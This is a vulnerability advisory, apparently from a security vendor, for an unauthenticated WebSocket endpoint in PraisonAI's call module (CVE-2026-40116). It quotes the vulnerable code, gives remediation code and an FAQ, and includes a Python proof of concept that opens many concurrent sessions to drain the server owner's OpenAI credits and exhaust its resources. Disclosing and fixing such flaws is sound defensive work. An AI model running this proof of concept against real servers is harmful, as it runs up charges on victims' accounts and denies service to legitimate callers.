Summary
The /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits.
Details
The vulnerability exists in src/praisonai/praisonai/api/call.py. The FastAPI application defines a WebSocket endpoint at line 108 with no authentication middleware, no Twilio request signature validation, and no rate limiting:
# line 108-112, no auth, no middleware, accepts any WebSocket client
@app.websocket("/media-stream")
async def handle_media_stream(websocket: WebSocket):
"""Handle WebSocket connections between Twilio and OpenAI."""
print("Client connected")
await websocket.accept()
Immediately upon connection, the handler opens an authenticated session to OpenAI's paid Realtime API using the server's OPENAI_API_KEY:
# line 114-120, each unauthenticated connection spawns a paid API session
async with websockets.connect(
'wss://api.openai.com/v1/realtime?model=gpt-4o-realtime-preview-2024-10-01',
extra_headers={
"Authorization": f"Bearer {OPENAI_API_KEY}",
"OpenAI-Beta": "realtime=v1"
}
) as openai_ws:
The receive_from_twilio() coroutine then reads unlimited messages and forwards them directly to OpenAI:
# line 128-135, unbounded message ingestion, no size/rate check
async for message in websocket.iter_text():
data = json.loads(message)
if data['event'] == 'media' and openai_ws.open:
audio_append = {
"type": "input_audio_buffer.append",
"audio": data['media']['payload']
}
await openai_ws.send(json.dumps(audio_append))
The server binds to 0.0.0.0 (line 273) and can be exposed to the internet via ngrok (--public flag). Twilio's RequestValidator is never used, the endpoint was designed to receive Twilio media streams but performs no verification that the connecting client is actually Twilio. The standard mitigation for Twilio WebSocket endpoints is to validate the X-Twilio-Signature header, which is absent here.
Additionally, uvicorn.run() is called without a ws_max_size parameter (line 273), defaulting to 16MB per WebSocket message. Combined with no connection limit, this allows substantial memory consumption.
PoC
# Step 1: Verify the endpoint is accessible and accepts connections
python3 -c "
import asyncio
import websockets
import json
async def test():
async with websockets.connect('ws://TARGET:8090/media-stream') as ws:
# Send a start event (mimicking Twilio)
await ws.send(json.dumps({
'event': 'start',
'start': {'streamSid': 'attacker-session-1'}
}))
# Send a media event, this gets forwarded to OpenAI Realtime API
await ws.send(json.dumps({
'event': 'media',
'media': {'payload': 'SGVsbG8gV29ybGQ='}
}))
# Receive the OpenAI response routed back
response = await asyncio.wait_for(ws.recv(), timeout=10)
print('Received response (confirms OpenAI session active):', response[:200])
asyncio.run(test())
"
# Step 2: Demonstrate resource exhaustion, open multiple concurrent connections
# Each connection spawns an OpenAI Realtime API session billed to the server owner
python3 -c "
import asyncio
import websockets
import json
import base64
async def open_session(i):
uri = 'ws://TARGET:8090/media-stream'
async with websockets.connect(uri) as ws:
await ws.send(json.dumps({
'event': 'start',
'start': {'streamSid': f'attacker-{i}'}
}))
# Send audio data to keep the OpenAI session active and billing
payload = base64.b64encode(b'\\x00' * 8000).decode() # ~8KB audio chunk
for _ in range(100):
await ws.send(json.dumps({
'event': 'media',
'media': {'payload': payload}
}))
await asyncio.sleep(0.01)
print(f'Session {i}: sent 100 audio chunks to OpenAI via proxy')
async def main():
# Open 10 concurrent sessions (each consuming OpenAI Realtime API credits)
await asyncio.gather(*[open_session(i) for i in range(10)])
asyncio.run(main())
"
Replace TARGET with the server's hostname/IP. Each connection in Step 2 opens a separate authenticated OpenAI Realtime API session. The server logs will show "Client connected" and "Incoming stream has started" for each attacker session.
Impact
OpenAI API credit drain: Each unauthenticated WebSocket connection opens a billed OpenAI Realtime API session. An attacker can open many concurrent sessions and stream audio data, accumulating charges on the victim's OpenAI account. The Realtime API bills per-second of audio, making this financially impactful.
Denial of service: Legitimate Twilio callers are denied service when the server's resources (memory, file descriptors, OpenAI API rate limits) are exhausted by attacker connections.
Server memory exhaustion: With no per-message size limit (16MB default) and no connection limit, an attacker can consume server memory by opening many connections and sending large payloads.
The application allocates resources such as memory, threads, or file descriptors based on untrusted input without enforcing a cap. Typical impact: resource exhaustion leading to denial of service.
CVE-2026-40116 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.5.128); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Add Twilio signature validation, connection limits, and rate limiting:
from twilio.request_validator import RequestValidator
from starlette.websockets import WebSocketState
import time
# Connection tracking
MAX_CONCURRENT_CONNECTIONS = 20
active_connections = 0
connection_lock = asyncio.Lock()
TWILIO_AUTH_TOKEN = os.getenv('TWILIO_AUTH_TOKEN')
@app.websocket("/media-stream")
async def handle_media_stream(websocket: WebSocket):
global active_connections
# Enforce connection limit
async with connection_lock:
if active_connections >= MAX_CONCURRENT_CONNECTIONS:
await websocket.close(code=1008, reason="Too many connections")
return
active_connections += 1
try:
# Validate Twilio signature if auth token is configured
if TWILIO_AUTH_TOKEN:
validator = RequestValidator(TWILIO_AUTH_TOKEN)
url = str(websocket.url).replace("ws://", "http://").replace("wss://", "https://")
signature = websocket.headers.get("X-Twilio-Signature", "")
if not validator.validate(url, {}, signature):
await websocket.close(code=1008, reason="Invalid signature")
return
await websocket.accept()
# ... rest of handler ...
finally:
async with connection_lock:
active_connections -= 1
Additionally, pass ws_max_size to uvicorn to limit individual message sizes:
uvicorn.run(app, host="0.0.0.0", port=port, log_level="warning", ws_max_size=1_048_576) # 1MB
Frequently Asked Questions
- What is CVE-2026-40116? CVE-2026-40116 is a high-severity allocation of resources without limits or throttling vulnerability in PraisonAI (pip), affecting versions < 4.5.128. It is fixed in 4.5.128. The application allocates resources such as memory, threads, or file descriptors based on untrusted input without enforcing a cap.
- How severe is CVE-2026-40116? CVE-2026-40116 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of PraisonAI are affected by CVE-2026-40116? PraisonAI (pip) versions < 4.5.128 is affected.
- Is there a fix for CVE-2026-40116? Yes. CVE-2026-40116 is fixed in 4.5.128. Upgrade to this version or later.
- Is CVE-2026-40116 exploitable, and should I be worried? Whether CVE-2026-40116 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-40116 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40116? Upgrade
PraisonAIto 4.5.128 or later.